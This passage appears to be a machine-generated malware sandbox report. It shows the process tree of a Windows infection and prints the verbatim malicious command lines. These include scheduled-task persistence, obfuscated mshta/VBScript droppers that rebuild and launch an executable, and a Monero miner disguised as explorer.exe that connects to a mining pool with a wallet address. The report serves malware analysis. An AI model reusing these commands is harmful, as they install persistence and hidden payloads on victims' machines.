                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Nanxd0\etj8l08paz78.exe"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6328
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4629.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4629.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:880
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9554.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9554.exe
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:8332
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03ea09aa5c9686e5.exe
                                                                                                                                                                                                                                                                        Sun03ea09aa5c9686e5.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                        PID:3892
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:2644
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:1004
                                                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:6112
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:6900
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                          PID:5384
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:1084
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:5404
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                  PID:5076
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                      PID:4268
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                          PID:552
                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                        PID:6168
                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Nanxd0\etj8l08paz78.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Nanxd0\etj8l08paz78.exe"
                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                          PID:2544
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:5428
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8292732.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8292732.exe"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:6320
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1706573.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1706573.exe"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                  PID:7084
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6109145.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6109145.exe"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                  PID:6816
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3893969.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3893969.exe"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                  PID:6568
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4659726.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4659726.exe"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                  PID:5132
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:2856
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5532052.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5532052.exe"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:4664
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Roaming\5532052.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" == """" for %N In (""C:\Users\Admin\AppData\Roaming\5532052.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:2216
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Roaming\5532052.exe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" == "" for %N In ("C:\Users\Admin\AppData\Roaming\5532052.exe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                              PID:6020
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                taskkill -IM "5532052.exe" /F
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                PID:4564
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1219031.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1219031.exe"
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:6532
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:5972
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:6088
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 296
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                            PID:6304
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:3600
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:5880
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:724
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:6168
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:6964
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                    taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                    PID:5224
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                                                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                      PID:3404
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:5672
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:5800
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                            PID:4208
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                PID:6080
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                    PID:3436
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                      PID:6292
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                      msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      PID:4856
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:932
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:2168
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:5460
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 5460 -s 1956
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                PID:6796
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              PID:5612
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                PID:1132
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-F8JNG.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-F8JNG.tmp\Sun03f5d51697d04.tmp" /SL5="$1021C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f5d51697d04.exe"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:2172
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:2372
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-PAJQQ.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-PAJQQ.tmp\Sun03f5d51697d04.tmp" /SL5="$2021E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                              PID:4828
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LNJ27.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LNJ27.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                PID:6036
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2516 -ip 2516
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                          PID:5284
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:4904
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 452
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                              PID:6048
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                            PID:2552
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4904 -ip 4904
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:5168
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4388 -ip 4388
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                            PID:444
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5940 -ip 5940
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:1312
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 544 -p 3600 -ip 3600
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:4716
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3412 -ip 3412
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:6492
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3316 -ip 3316
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:6732
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 452 -p 5460 -ip 5460
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:1784
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                PID:6572
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 448
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                  PID:4560
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 6572 -ip 6572
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:4948
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5948 -ip 5948
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:4152
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5124 -ip 5124
                                                                                                                                                                                                                                                                                                                              1⤵
